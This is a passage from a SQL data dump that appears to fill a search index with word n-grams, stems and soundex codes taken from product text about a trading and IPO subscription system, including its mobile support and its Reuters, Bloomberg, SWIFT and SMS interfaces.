will',0,1,1.4667,'H35414',1,'en'),(12425,'installation','instal',0,0,0.8,'I523435',1,'en'),(12426,'installation and','instal and',0,1,1.5333,'I5234353',1,'en'),(12427,'installation and maintenance','instal and maintenance',0,1,1.9333,'I52343535352',1,'en'),(12428,'ios','io',0,0,0.2,'I200',1,'en'),(12429,'ios android','io android',0,1,1.3667,'I25363',1,'en'),(12430,'ios android windows','io android windows',0,1,1.6333,'I25363532',1,'en'),(12431,'l0','l0',0,0,0.1333,'L000',1,'en'),(12432,'l0 level2','l0 level2',0,1,1.3,'L140',1,'en'),(12433,'l0 level2 lfo1','l0 level2 lfo1',0,1,1.4667,'L141',1,'en'),(12434,'level2','level2',0,0,0.4,'L140',1,'en'),(12435,'level2 lfo1','level2 lfo1',0,1,1.3667,'L141',1,'en'),(12436,'level2 lfo1 d','level2 lfo1 d',0,1,1.4333,'L1413',1,'en'),(12437,'lfo1','lfo1',0,0,0.2667,'L100',1,'en'),(12438,'lfo1 d','lfo1 d',0,1,1.2,'L130',1,'en'),(12439,'lfo1 d graphs','lfo1 d graphs',0,1,1.4333,'L132612',1,'en'),(12440,'mobile os\'s','mobil os',0,1,1.3667,'M142',1,'en'),(12441,'mobile os\'s whether','mobil os whether',0,1,1.6333,'M14236',1,'en'),(12442,'mobile tablet','mobil tablet',0,1,1.4333,'M143143',1,'en'),(12443,'mobile tablet trading','mobil tablet trading',0,1,1.7,'M1431436352',1,'en'),(12444,'mso-list','mso-list',0,0,0.5333,'M2423',1,'en'),(12445,'mso-list l0','mso-list l0',0,1,1.3667,'M24234',1,'en'),(12446,'mso-list l0 level2','mso-list l0 level2',0,1,1.6,'M2423414',1,'en'),(12447,'of devices','of devices',0,1,1.3333,'O1312',1,'en'),(12448,'of devices html5','of devices html5',0,1,1.5333,'O1312354',1,'en'),(12449,'office system b','offic system b',0,1,1.5,'O12351',1,'en'),(12450,'on different','on different',0,1,1.4,'O531653',1,'en'),(12451,'on different mobile','on different mobile',0,1,1.6333,'O531653514',1,'en'),(12452,'or blackberry','or blackberry',0,1,1.4333,'O614216',1,'en'),(12453,'or blackberry c','or blackberry c',0,1,1.5,'O6142162',1,'en'),(12454,'os\'s','os',0,0,0.2667,'O200',1,'en'),(12455,'os\'s whether','os whether',0,1,1.4,'O236',1,'en'),(12456,'os\'s whether that\'s','os whether that',0,1,1.6333,'O23632',1,'en'),(12457,'phone','phone',0,0,0.3333,'P500',4,'en'),(12458,'phone or','phone or',0,1,1.2667,'P560',1,'en'),(12459,'phone or blackberry','phone or blackberry',0,1,1.6333,'P5614216',1,'en'),(12460,'range','rang',0,0,0.3333,'R520',3,'en'),(12461,'range of','rang of',0,1,1.2667,'R521',3,'en'),(12462,'range of devices','rang of devices',0,1,1.5333,'R521312',1,'en'),(12463,'system b','system b',0,1,1.2667,'S351',1,'en'),(12464,'system b compatibility','system b compatibility',0,1,1.7333,'S3512513143',1,'en'),(12465,'tablet','tablet',0,0,0.4,'T143',2,'en'),(12466,'tablet trading','tablet trading',0,1,1.4667,'T1436352',1,'en'),(12467,'tablet trading information','tablet trading information',0,1,1.8667,'T1436352516535',1,'en'),(12468,'text-indent','text-ind',0,0,0.7333,'T235353',1,'en'),(12469,'text-indent -.25in','text-ind -.25in',0,1,1.6,'T2353535',1,'en'),(12470,'text-indent -.25in mso-list','text-ind -.25in mso-list',0,1,1.9,'T23535352423',1,'en'),(12471,'that\'s','that',0,0,0.4,'T200',6,'en'),(12472,'that\'s ios','that ios',0,1,1.3333,'T200',1,'en'),(12473,'that\'s ios android','that ios android',0,1,1.6,'T25363',1,'en'),(12474,'trading information','trade information',0,1,1.6333,'T6352516535',1,'en'),(12475,'trading information dissemination','trade information dissemination',0,1,2,'T635251653532535',1,'en'),(12476,'whether that\'s','whether that',0,1,1.4667,'W3632',1,'en'),(12477,'whether that\'s ios','whether that ios',0,1,1.6,'W3632',1,'en'),(12478,'will work','will work',0,1,1.3,'W462',1,'en'),(12479,'will work on','will work on',0,1,1.4,'W4625',1,'en'),(12480,'windows','window',0,0,0.4667,'W532',3,'en'),(12481,'windows phone','window phone',0,1,1.4333,'W53215',1,'en'),(12482,'windows phone or','window phone or',0,1,1.5333,'W532156',1,'en'),(12483,'work on','work on',0,1,1.2333,'W625',1,'en'),(12484,'work on different','work on different',0,1,1.5667,'W62531653',1,'en'),(12570,'123','123',0,0,0.3,'',1,'en'),(12571,'7pt','7pt',0,0,0.2,'P300',1,'en'),(12572,'7pt line-height','7pt line-height',0,1,1.5,'P34523',1,'en'),(12573,'7pt line-height normal','7pt line-height normal',0,1,1.7333,'P345235654',1,'en'),(12574,'a reuters','a reuters',0,1,1.3,'A6362',1,'en'),(12575,'a reuters order','a reuters order',0,1,1.5,'A6362636',1,'en'),(12576,'application d','applic d',0,1,1.4333,'A142353',1,'en'),(12577,'b bloomberg','b bloomberg',0,1,1.3667,'B45162',1,'en'),(12578,'b bloomberg interface','b bloomberg interface',0,1,1.7,'B4516253612',1,'en'),(12579,'banking application','bank application',0,1,1.6333,'B525214235',1,'en'),(12580,'banking application d','bank application d',0,1,1.7,'B5252142353',1,'en'),(12581,'bloomberg','bloomberg',0,0,0.6,'B45162',1,'en'),(12582,'bloomberg interface','bloomberg interface',0,1,1.6333,'B4516253612',1,'en'),(12583,'bloomberg interface c','bloomberg interface c',0,1,1.7,'B4516253612',1,'en'),(12584,'c core','c core',0,1,1.2,'C600',1,'en'),(12585,'c core banking','c core banking',0,1,1.4667,'C615252',1,'en'),(12586,'call center interfaces','call center interfaces',0,1,1.7333,'C4253653612',1,'en'),(12587,'center interfaces','center interfaces',0,1,1.5667,'C53653612',1,'en'),(12588,'center interfaces f','center interfaces f',0,1,1.6333,'C536536121',1,'en'),(12589,'core banking application','core banking application',0,1,1.8,'C61525214235',1,'en'),(12590,'e call','e call',0,1,1.2,'E240',1,'en'),(12591,'e call center','e call center',0,1,1.4333,'E242536',1,'en'),(12592,'email','email',0,0,0.3333,'E540',2,'en'),(12593,'email interfaces','email interfaces',0,1,1.5333,'E5453612',1,'en'),(12594,'email interfaces more','email interfaces more',0,1,1.7,'E545361256',1,'en'),(12595,'f ivr','f ivr',0,1,1.1667,'F600',1,'en'),(12596,'f ivr interfaces','f ivr interfaces',0,1,1.5333,'F653612',1,'en'),(12597,'fax','fax',0,0,0.2,'F200',1,'en'),(12598,'fax interfaces','fax interfaces',0,1,1.4667,'F253612',1,'en'),(12599,'fax interfaces i','fax interfaces i',0,1,1.5333,'F253612',1,'en'),(12600,'font-size','font-siz',0,0,0.6,'F532',1,'en'),(12601,'font-size 7pt','font-siz 7pt',0,1,1.4333,'F53213',1,'en'),(12602,'font-size 7pt line-height','font-siz 7pt line-height',0,1,1.8333,'F532134523',1,'en'),(12603,'font-stretch','font-stretch',0,0,0.8,'F5323632',1,'en'),(12604,'font-stretch normal','font-stretch normal',0,1,1.6333,'F53236325654',1,'en'),(12605,'font-stretch normal font-size','font-stretch normal font-size',0,1,1.9667,'F532363256541532',1,'en'),(12606,'g sms','g sms',0,1,1.1667,'G520',1,'en'),(12607,'g sms gateway','g sms gateway',0,1,1.4333,'G523',1,'en'),(12608,'gateway','gatewai',0,0,0.4667,'G300',1,'en'),(12609,'h fax','h fax',0,1,1.1667,'H120',1,'en'),(12610,'h fax interfaces','h fax interfaces',0,1,1.5333,'H1253612',1,'en'),(12611,'i email','i email',0,1,1.2333,'I540',1,'en'),(12612,'i email interfaces','i email interfaces',0,1,1.6,'I5453612',1,'en'),(12613,'if','if',1,0,0.0167,'I100',9,'en'),(12614,'if supportlists','if supportlists',0,1,1.5,'I121634232',1,'en'),(12615,'if supportlists h','if supportlists h',0,1,1.5667,'I121634232',1,'en'),(12616,'interface','interfac',0,0,0.6,'I53612',1,'en'),(12617,'interface c','interfac c',0,1,1.3667,'I53612',1,'en'),(12618,'interface c core','interfac c core',0,1,1.5333,'I536126',1,'en'),(12619,'interface e','interfac e',0,1,1.3667,'I53612',1,'en'),(12620,'interface e call','interfac e call',0,1,1.5333,'I536124',1,'en'),(12621,'interfaces','interfac',0,0,0.6667,'I53612',1,'en'),(12622,'interfaces f','interfac f',0,1,1.4,'I536121',1,'en'),(12623,'interfaces f ivr','interfac f ivr',0,1,1.5333,'I5361216',1,'en'),(12624,'interfaces g','interfac g',0,1,1.4,'I53612',1,'en'),(12625,'interfaces g sms','interfac g sms',0,1,1.5333,'I5361252',1,'en'),(12626,'interfaces i','interfac i',0,1,1.4,'I53612',1,'en'),(12627,'interfaces i email','interfac i email',0,1,1.6,'I5361254',1,'en'),(12628,'interfaces more','interfac more',0,1,1.5,'I5361256',1,'en'),(12629,'interfaces more details','interfac more details',0,1,1.7667,'I5361256342',1,'en'),(12630,'interfaces with','interfac with',0,1,1.5,'I536123',1,'en'),(12631,'ivr','ivr',0,0,0.2,'I160',1,'en'),(12632,'ivr interfaces','ivr interfaces',0,1,1.4667,'I1653612',1,'en'),(12633,'ivr interfaces g','ivr interfaces g',0,1,1.5333,'I1653612',1,'en'),(12634,'line-height','line-height',0,0,0.7333,'L523',1,'en'),(12635,'line-height normal','line-height normal',0,1,1.6,'L5235654',1,'en'),(12636,'line-height normal font-family','line-height normal font-family',0,1,2,'L5235654153154',1,'en'),(12637,'normal font-size','normal font-size',0,1,1.5333,'N6541532',1,'en'),(12638,'normal font-size 7pt','normal font-size 7pt',0,1,1.6667,'N654153213',1,'en'),(12639,'order routing b','order routing b',0,1,1.5,'O6363521',1,'en'),(12640,'reuters','reuter',0,0,0.4667,'R362',2,'en'),(12641,'reuters order','reuter order',0,1,1.4333,'R362636',1,'en'),(12642,'reuters order routing','reuter order routing',0,1,1.7,'R362636352',1,'en'),(12643,'roman\' swift interface','roman swift interface',0,1,1.7333,'R521353612',1,'en'),(12644,'routing b','rout b',0,1,1.3,'R3521',1,'en'),(12645,'routing b bloomberg','rout b bloomberg',0,1,1.6333,'R352145162',1,'en'),(12646,'sms','sm',0,0,0.2,'S520',1,'en'),(12647,'sms gateway','sm gateway',0,1,1.3667,'S523',1,'en'),(12648,'supportlists h','supportlist h',0,1,1.4667,'S1634232',1,'en'),(12649,'supportlists h fax','supportlist h fax',0,1,1.6,'S163423212',1,'en'),(12650,'swift interface','swift interface',0,1,1.5,'S1353612',1,'en'),(12651,'swift interface e','swift interface e',0,1,1.5667,'S1353612',1,'en'),(12831,'multiple','multipl',0,0,0.5333,'M4314',2,'en'),(12834,'net','net',0,0,0.2,'N300',2,'en'),(12840,'operation','oper',0,0,0.6,'O1635',1,'en'),(12852,'report','report',0,0,0.4,'R163',1,'en'),(12855,'returns','return',0,0,0.4667,'R3652',2,'en'),(12864,'style','style',0,0,0.3333,'S340',4,'en'),(12996,'basic','basic',0,0,0.3333,'B200',2,'en'),(12999,'basis','basi',0,0,0.3333,'B200',1,'en'),(13005,'brokers','broker',0,0,0.4667,'B6262',1,'en'),(13038,'holding','hold',0,0,0.4667,'H4352',3,'en'),(13071,'share','share',0,0,0.3333,'S600',3,'en'),(13393,'a facilitate','a facilitate',0,1,1.4,'A1243',1,'en'),(13394,'a facilitate transaction','a facilitate transaction',0,1,1.8,'A124365235',1,'en'),(13395,'a wide','a wide',0,1,1.2,'A300',1,'en'),(13396,'a wide range','a wide range',0,1,1.4,'A3652',1,'en'),(13397,'after','after',1,0,0.0417,'A136',9,'en'),(13398,'after the','after the',0,1,1.3,'A1363',4,'en'),(13399,'after the validation','after the validation',0,1,1.6667,'A13631435',1,'en'),(13400,'allotment','allot',0,0,0.6,'A4353',1,'en'),(13401,'allotment before','allot before',0,1,1.5333,'A435316',1,'en'),(13402,'allotment before close','allot before close',0,1,1.7333,'A435316242',1,'en'),(13403,'allowed','allow',0,0,0.4667,'A430',2,'en'),(13404,'allowed e','allow e',0,1,1.3,'A430',1,'en'),(13405,'allowed e different','allow e different',0,1,1.6333,'A431653',1,'en'),(13406,'also','also',0,0,0.2667,'A420',12,'en'),(13407,'also a','also a',0,1,1.2,'A420',1,'en'),(13408,'also a wide','also a wide',0,1,1.3667,'A423',1,'en'),(13409,'alteration','alter',0,0,0.6667,'A43635',1,'en'),(13410,'alteration to','alter to',0,1,1.4333,'A436353',1,'en'),(13411,'alteration to the','alter to the',0,1,1.5667,'A436353',1,'en'),(13412,'and approval','and approval',0,1,1.4,'A531614',1,'en'),(13413,'and approval of','and approval of',0,1,1.5,'A5316141',1,'en'),(13414,'and automated','and automated',0,1,1.4333,'A5353',1,'en'),(13415,'and automated entry','and automated entry',0,1,1.6333,'A5353536',1,'en'),(13416,'and send','and send',0,1,1.2667,'A53253',1,'en'),(13417,'and send it','and send it',0,1,1.3667,'A53253',1,'en'),(13418,'and then','and then',0,1,1.2667,'A535',2,'en'),(13419,'and then the','and then the',0,1,1.4,'A5353',1,'en'),(13420,'and verify','and verify',0,1,1.3333,'A53161',1,'en'),(13421,'and verify his','and verify his',0,1,1.4667,'A531612',1,'en'),(13422,'application can','applic can',0,1,1.5,'A1423525',1,'en'),(13423,'application can view','applic can view',0,1,1.6667,'A14235251',1,'en'),(13424,'application is','applic is',0,1,1.4667,'A142352',1,'en'),(13425,'application is entered','applic is entered',0,1,1.7333,'A1423525363',1,'en'),(13426,'applications by','applic by',0,1,1.5,'A1423521',1,'en'),(13427,'applications by the','applic by the',0,1,1.6333,'A14235213',1,'en'),(13428,'applications will','applic will',0,1,1.5667,'A1423524',1,'en'),(13429,'applications will be','applic will be',0,1,1.6667,'A14235241',1,'en'),(13430,'approval','approv',0,0,0.5333,'A1614',2,'en'),(13431,'approval of','approv of',0,1,1.3667,'A16141',1,'en'),(13432,'approval of the','approv of the',0,1,1.5,'A161413',1,'en'),(13433,'approved','approv',0,0,0.5333,'A1613',3,'en'),(13434,'approved d','approv d',0,1,1.3333,'A1613',1,'en'),(13435,'approved d after','approv d after',0,1,1.5333,'A1613136',1,'en'),(13436,'automated','autom',0,0,0.6,'A353',2,'en'),(13437,'automated entry','autom entry',0,1,1.5,'A353536',1,'en'),(13438,'automated entry file','autom entry file',0,1,1.6667,'A35353614',1,'en'),(13439,'b the','b the',0,1,1.1667,'B300',1,'en'),(13440,'b the system','b the system',0,1,1.4,'B3235',1,'en'),(13441,'basis to','basi to',0,1,1.2667,'B230',1,'en'),(13442,'basis to check','basi to check',0,1,1.4667,'B232',1,'en'),(13443,'batch','batch',0,0,0.3333,'B320',1,'en'),(13444,'batch files','batch files',0,1,1.3667,'B32142',1,'en'),(13445,'batch files and','batch files and',0,1,1.5,'B3214253',1,'en'),(13446,'be generated','be generated',0,1,1.4,'B2563',1,'en'),(13447,'be generated by','be generated by',0,1,1.5,'B25631',1,'en'),(13448,'be saved','be saved',0,1,1.2667,'B213',1,'en'),(13449,'be saved directly','be saved directly',0,1,1.5667,'B2136234',1,'en'),(13450,'be sent','be sent',0,1,1.2333,'B253',2,'en'),(13451,'be sent to','be sent to',0,1,1.3333,'B253',1,'en'),(13452,'be validated','be validated',0,1,1.4,'B430',1,'en'),(13453,'be validated and','be validated and',0,1,1.5333,'B4353',1,'en'),(13454,'before','befor',0,0,0.4,'B600',9,'en'),(13455,'before close','befor close',0,1,1.4,'B6242',1,'en'),(13456,'before close the','befor close the',0,1,1.5333,'B62423',1,'en'),(13457,'by subscription','by subscription',0,1,1.5,'B2126135',1,'en'),(13458,'by subscription outlet','by subscription outlet',0,1,1.7333,'B2126135343',1,'en'),(13459,'by the','by the',0,1,1.2,'B300',8,'en'),(13460,'by the ipo','by the ipo',0,1,1.3333,'B310',1,'en'),(13461,'by the subscription','by the subscription',0,1,1.6333,'B32126135',1,'en'),(13462,'c the','c the',0,1,1.1667,'C300',1,'en'),(13463,'c the user','c the user',0,1,1.3333,'C326',1,'en'),(13464,'can be','can be',0,1,1.2,'C510',4,'en'),(13465,'can be generated','can be generated',0,1,1.5333,'C512563',1,'en'),(13466,'can generate','can generate',0,1,1.4,'C52563',1,'en'),(13467,'can generate deferent','can generate deferent',0,1,1.7,'C525631653',1,'en'),(13468,'can view','can view',0,1,1.2667,'C510',1,'en'),(13469,'can view and','can view and',0,1,1.4,'C5153',1,'en'),(13470,'center each','center each',0,1,1.3667,'C5362',1,'en'),(13471,'center each subscription','center each subscription',0,1,1.8,'C5362126135',1,'en'),(13472,'center no','center no',0,1,1.3,'C5365',1,'en'),(13473,'center no other','center no other',0,1,1.5,'C536536',1,'en'),(13474,'center on','center on',0,1,1.3,'C5365',1,'en'),(13475,'center on real','center on real',0,1,1.4667,'C536564',1,'en'),(13476,'center to','center to',0,1,1.3,'C5363',1,'en'),(13477,'center to be','center to be',0,1,1.4,'C53631',1,'en'),(13478,'central','central',0,0,0.4667,'C5364',3,'en'),(13479,'central database','central database',0,1,1.5333,'C5364312',1,'en'),(13480,'central database c','central database c',0,1,1.6,'C5364312',1,'en'),(13481,'check','check',0,0,0.3333,'C000',3,'en'),(13482,'check on','check on',0,1,1.2667,'C500',1,'en'),(13483,'check on the','check on the',0,1,1.4,'C530',1,'en'),(13484,'close','close',0,0,0.3333,'C420',2,'en'),(13485,'close the','close the',0,1,1.3,'C423',1,'en'),(13486,'d after','d after',0,1,1.2333,'D136',1,'en'),(13487,'d after the','d after the',0,1,1.3667,'D1363',1,'en'),(13488,'data is','data is',0,1,1.2333,'D200',1,'en'),(13489,'data is allowed','data is allowed',0,1,1.5,'D243',1,'en'),(13490,'database','databas',0,0,0.5333,'D120',1,'en'),(13491,'database c','databas c',0,1,1.3333,'D120',1,'en'),(13492,'database c the','databas c the',0,1,1.4667,'D123',1,'en'),(13493,'deferent','defer',0,0,0.5333,'D1653',1,'en'),(13494,'deferent scenarios','defer scenarios',0,1,1.6,'D16532562',1,'en'),(13495,'deferent scenarios for','defer scenarios for',0,1,1.7333,'D1653256216',1,'en'),(13496,'different reports','differ reports',0,1,1.5667,'D165361632',1,'en'),(13497,'different reports can','differ reports can',0,1,1.7,'D1653616325',1,'en'),(13498,'directly','directli',0,0,0.5333,'D6234',1,'en'),(13499,'directly into','directli into',0,1,1.4333,'D623453',1,'en'),(13500,'directly into the','directli into the',0,1,1.5667,'D623453',1,'en'),(13501,'e different','e different',0,1,1.3667,'E31653',1,'en'),(13502,'e different reports','e different reports',0,1,1.6333,'E3165361632',1,'en'),(13503,'each','each',0,0,0.2667,'E200',5,'en'),(13504,'each subscription','each subscription',0,1,1.5667,'E2126135',1,'en'),(13505,'each subscription application','each subscription application',0,1,1.9667,'E212613514235',1,'en'),(13506,'eliminate','elimin',0,0,0.6,'E453',2,'en'),(13507,'eliminate the','elimin the',0,1,1.4333,'E453',1,'en'),(13508,'eliminate the need','elimin the need',0,1,1.6,'E45353',1,'en'),(13509,'ensure','ensur',0,0,0.4,'E526',2,'en'),(13510,'ensure the','ensur the',0,1,1.3333,'E5263',1,'en'),(13511,'ensure the validity','ensur the validity',0,1,1.6333,'E5263143',1,'en'),(13512,'entered','enter',0,0,0.4667,'E5363',1,'en'),(13513,'entered by','enter by',0,1,1.3333,'E53631',1,'en'),(13514,'entered by the','enter by the',0,1,1.4667,'E536313',1,'en'),(13515,'entered the','enter the',0,1,1.3667,'E5363',1,'en'),(13516,'entered the application','enter the application',0,1,1.7667,'E536314235',1,'en'),(13517,'entry and','entri and',0,1,1.3,'E53653',2,'en'),(13518,'entry and then','entri and then',0,1,1.4667,'E536535',1,'en'),(13519,'entry file','entri file',0,1,1.3333,'E53614',1,'en'),(13520,'entry file upload','entri file upload',0,1,1.5667,'E53614143',1,'en'),(13521,'export','export',0,0,0.4,'E2163',1,'en'),(13522,'export b','export b',0,1,1.2667,'E21631',1,'en'),(13523,'export b the','export b the',0,1,1.4,'E216313',1,'en'),(13524,'f can','f can',0,1,1.1667,'F250',1,'en'),(13525,'f can generate','f can generate',0,1,1.4667,'F252563',1,'en'),(13526,'facilitate','facilit',0,0,0.6667,'F243',1,'en'),(13527,'facilitate transaction','facilit transaction',0,1,1.7333,'F24365235',1,'en'),(13528,'facilitate transaction manual','facilit transaction manual',0,1,1.9667,'F243652354',1,'en'),(13529,'file','file',0,0,0.2667,'F400',1,'en'),(13530,'file upload','file upload',0,1,1.3667,'F4143',1,'en'),(13531,'file upload export','file upload export',0,1,1.6,'F41432163',1,'en'),(13532,'files','file',0,0,0.3333,'F420',1,'en'),(13533,'files and','file and',0,1,1.3,'F4253',1,'en'),(13534,'files and send','file and send',0,1,1.4667,'F4253253',1,'en'),(13535,'for allotment','for allotment',0,1,1.4333,'F64353',1,'en'),(13536,'for allotment before','for allotment before',0,1,1.6667,'F6435316',1,'en'),(13537,'generate','gener',0,0,0.5333,'G563',2,'en'),(13538,'generate deferent','gener deferent',0,1,1.5667,'G5631653',1,'en'),(13539,'generate deferent scenarios','gener deferent scenarios',0,1,1.9,'G56316532562',1,'en'),(13540,'generated','gener',0,0,0.6,'G563',1,'en'),(13541,'generated by','gener by',0,1,1.4,'G5631',1,'en'),(13542,'generated by subscription','gener by subscription',0,1,1.8333,'G56312126135',1,'en'),(13543,'generated by the','gener by the',0,1,1.5333,'G56313',1,'en'),(13544,'his','hi',0,0,0.2,'H200',10,'en'),(13545,'his entry','hi entry',0,1,1.3,'H2536',1,'en'),(13546,'his entry and','hi entry and',0,1,1.4333,'H253653',1,'en'),(13547,'initial','initi',0,0,0.4667,'I534',4,'en'),(13548,'initial public','initi public',0,1,1.4667,'I534142',2,'en'),(13549,'initial public offering','initi public offering',0,1,1.7667,'I5341421652',2,'en'),(13550,'input','input',0,0,0.3333,'I513',2,'en'),(13551,'input also','input also',0,1,1.3333,'I51342',1,'en'),(13552,'input also a','input also a',0,1,1.4,'I51342',1,'en'),(13553,'into','into',1,0,0.0333,'I530',9,'en'),(13554,'into the','into the',0,1,1.2667,'I530',1,'en'),(13555,'into the central','into the central',0,1,1.5333,'I5325364',1,'en'),(13556,'ipo center','ipo center',0,1,1.3333,'I12536',1,'en'),(13557,'ipo center each','ipo center each',0,1,1.5,'I125362',1,'en'),(13558,'ipo center no','ipo center no',0,1,1.4333,'I125365',1,'en'),(13559,'ipo center on','ipo center on',0,1,1.4333,'I125365',1,'en'),(13560,'ipo center to','ipo center to',0,1,1.4333,'I125363',1,'en'),(13561,'is allowed','is allowed',0,1,1.3333,'I243',1,'en'),(13562,'is allowed e','is allowed e',0,1,1.4,'I243',1,'en'),(13563,'is entered','is entered',0,1,1.3333,'I25363',1,'en'),(13564,'is entered by','is entered by',0,1,1.4333,'I253631',1,'en'),(13565,'it to the','it to the',0,1,1.3,'I300',1,'en'),(13566,'manual','manual',0,0,0.4,'M400',1,'en'),(13567,'manual and','manual and',0,1,1.3333,'M453',1,'en'),(13568,'manual and automated','manual and automated',0,1,1.6667,'M45353',1,'en'),(13569,'manual applications','manual applications',0,1,1.6333,'M4142352',1,'en'),(13570,'manual applications will','manual applications will',0,1,1.8,'M41423524',1,'en'),(13571,'need','need',0,0,0.2667,'N300',7,'en'),(13572,'need to','need to',0,1,1.2333,'N300',5,'en'),(13573,'need to produce','need to produce',0,1,1.5,'N31632',1,'en'),(13574,'no','no',1,0,0.0167,'N000',9,'en'),(13575,'no other','no other',0,1,1.2667,'N360',2,'en'),(13576,'no other alteration','no other alteration',0,1,1.6333,'N3643635',1,'en'),(13577,'of reports','of reports',0,1,1.3333,'O161632',1,'en'),(13578,'of reports can','of reports can',0,1,1.4667,'O1616325',1,'en'),(13579,'of the applications','of the applications',0,1,1.6333,'O13142352',1,'en'),(13580,'of their','of their',0,1,1.2667,'O136',1,'en'),(13581,'of their input','of their input',0,1,1.4667,'O136513',1,'en'),(13582,'offering','offer',0,0,0.5333,'O1652',3,'en'),(13583,'offering solution','offer solution',0,1,1.5667,'O1652435',2,'en'),(13584,'offering solution ipo','offer solution ipo',0,1,1.7,'O16524351',2,'en'),(13585,'on real','on real',0,1,1.2333,'O564',1,'en'),(13586,'on real time','on real time',0,1,1.4,'O56435',1,'en'),(13587,'on the subscription','on the subscription',0,1,1.6333,'O532126135',1,'en'),(13588,'other alteration','other alteration',0,1,1.5333,'O3643635',1,'en'),(13589,'other alteration to','other alteration to',0,1,1.6333,'O36436353',1,'en'),(13590,'outlet','outlet',0,0,0.4,'O343',10,'en'),(13591,'outlet to','outlet to',0,1,1.3,'O343',1,'en'),(13592,'outlet to ensure','outlet to ensure',0,1,1.5333,'O343526',1,'en'),(13593,'outlet will','outlet will',0,1,1.3667,'O3434',1,'en'),(13594,'outlet will be','outlet will be',0,1,1.4667,'O34341',1,'en'),(13595,'produce','produc',0,0,0.4667,'P632',2,'en'),(13596,'produce batch','produc batch',0,1,1.4333,'P632132',1,'en'),(13597,'produce batch files','produc batch files',0,1,1.6333,'P632132142',1,'en'),(13598,'progress','progress',0,0,0.5333,'P6262',1,'en'),(13599,'progress f','progress f',0,1,1.3333,'P62621',1,'en'),(13600,'progress f can','progress f can',0,1,1.4667,'P6262125',1,'en'),(13601,'public','public',0,0,0.4,'P420',4,'en'),(13602,'public offering','public offering',0,1,1.5,'P421652',2,'en'),(13603,'public offering solution','public offering solution',0,1,1.8,'P421652435',2,'en'),(13604,'range of reports','rang of reports',0,1,1.5333,'R52161632',1,'en'),(13605,'real time basis','real time basis',0,1,1.5,'R43512',1,'en'),(13606,'reports','report',0,0,0.4667,'R1632',3,'en'),(13607,'reports can','report can',0,1,1.3667,'R16325',1,'en'),(13608,'reports can be','report can be',0,1,1.4667,'R163251',1,'en'),(13609,'saved','save',0,0,0.3333,'S130',1,'en'),(13610,'saved directly','save directly',0,1,1.4667,'S136234',1,'en'),(13611,'saved directly into','save directly into',0,1,1.6333,'S13623453',1,'en'),(13612,'scenarios','scenario',0,0,0.6,'S562',1,'en'),(13613,'scenarios for','scenario for',0,1,1.4333,'S56216',1,'en'),(13614,'scenarios for allotment','scenario for allotment',0,1,1.7667,'S562164353',1,'en'),(13615,'send','send',0,0,0.2667,'S530',2,'en'),(13616,'send it','send it',0,1,1.2333,'S530',1,'en'),(13617,'send it to','send it to',0,1,1.3333,'S530',1,'en'),(13618,'sent','sent',0,0,0.2667,'S530',2,'en'),(13619,'sent to','sent to',0,1,1.2333,'S530',1,'en'),(13620,'sent to the','sent to the',0,1,1.3667,'S530',1,'en'),(13621,'solution ipo','solut ipo',0,1,1.4,'S4351',2,'en'),(13622,'solution ipo manager','solut ipo manager',0,1,1.6667,'S4351526',2,'en'),(13623,'subscription','subscript',0,0,0.8,'S126135',1,'en'),(13624,'subscription application','subscript application',0,1,1.8,'S12613514235',1,'en'),(13625,'subscription application is','subscript application is',0,1,1.9,'S126135142352',1,'en'),(13626,'subscription more','subscript more',0,1,1.5667,'S1261356',1,'en'),(13627,'subscription more details','subscript more details',0,1,1.8333,'S1261356342',1,'en'),(13628,'subscription outlet','subscript outlet',0,1,1.6333,'S126135343',1,'en'),(13629,'subscription outlet to','subscript outlet to',0,1,1.7333,'S126135343',1,'en'),(13630,'subscription outlet will','subscript outlet will',0,1,1.8,'S1261353434',1,'en'),(13631,'subscription progress','subscript progress',0,1,1.7,'S12613516262',1,'en'),(13632,'subscription progress f','subscript progress f',0,1,1.7667,'S126135162621',1,'en'),(13633,'system will','system will',0,1,1.3667,'S354',1,'en'),(13634,'system will eliminate','system will eliminate',0,1,1.7,'S35453',1,'en'),(13635,'the application','the application',0,1,1.5,'T14235',1,'en'),(13636,'the application can','the application can',0,1,1.6333,'T1423525',1,'en'),(13637,'the applications','the applications',0,1,1.5333,'T142352',1,'en'),(13638,'the applications by','the applications by',0,1,1.6333,'T1423521',1,'en'),(13639,'the central','the central',0,1,1.3667,'T25364',1,'en'),(13640,'the central database','the central database',0,1,1.6667,'T25364312',1,'en'),(13641,'the data','the data',0,1,1.2667,'T000',1,'en'),(13642,'the data is','the data is',0,1,1.3667,'T200',1,'en'),(13643,'the ipo','the ipo',0,1,1.2333,'T100',1,'en'),(13644,'the ipo center','the ipo center',0,1,1.4667,'T12536',1,'en'),(13645,'the manual','the manual',0,1,1.3333,'T540',1,'en'),(13646,'the manual applications','the manual applications',0,1,1.7667,'T54142352',1,'en'),(13647,'the need','the need',0,1,1.2667,'T530',2,'en'),(13648,'the need to','the need to',0,1,1.3667,'T530',1,'en'),(13649,'the subscription','the subscription',0,1,1.5333,'T2126135',1,'en'),(13650,'the subscription outlet','the subscription outlet',0,1,1.7667,'T2126135343',1,'en'),(13651,'the subscription progress','the subscription progress',0,1,1.8333,'T212613516262',1,'en'),(13652,'the system will','the system will',0,1,1.5,'T2354',1,'en'),(13653,'the user','the user',0,1,1.2667,'T260',1,'en'),(13654,'the user entered','the user entered',0,1,1.5333,'T265363',1,'en'),(13655,'the validation','the validation',0,1,1.4667,'T1435',1,'en'),(13656,'the validation and','the validation and',0,1,1.6,'T14353',1,'en'),(13657,'the validity','the validity',0,1,1.4,'T143',1,'en'),(13658,'the validity of','the validity of',0,1,1.5,'T1431',1,'en'),(13659,'their input','their input',0,1,1.3667,'T6513',1,'en'),(13660,'their input also','their input also',0,1,1.5333,'T651342',1,'en'),(13661,'then','then',1,0,0.0333,'T500',8,'en'),(13662,'then the','then the',0,1,1.2667,'T530',2,'en'),(13663,'then the manual','then the manual',0,1,1.5,'T5354',1,'en'),(13664,'time basis','time basis',0,1,1.3333,'T512',1,'en'),(13665,'time basis to','time basis to',0,1,1.4333,'T5123',1,'en'),(13666,'to be validated','to be validated',0,1,1.5,'T143',1,'en'),(13667,'to check','to check',0,1,1.2667,'T200',2,'en'),(13668,'to check on','to check on',0,1,1.3667,'T250',1,'en'),(13669,'to ensure','to ensure',0,1,1.3,'T526',1,'en'),(13670,'to ensure the','to ensure the',0,1,1.4333,'T5263',1,'en'),(13671,'to produce','to produce',0,1,1.3333,'T1632',1,'en'),(13672,'to produce batch','to produce batch',0,1,1.5333,'T1632132',1,'en'),(13673,'to the data','to the 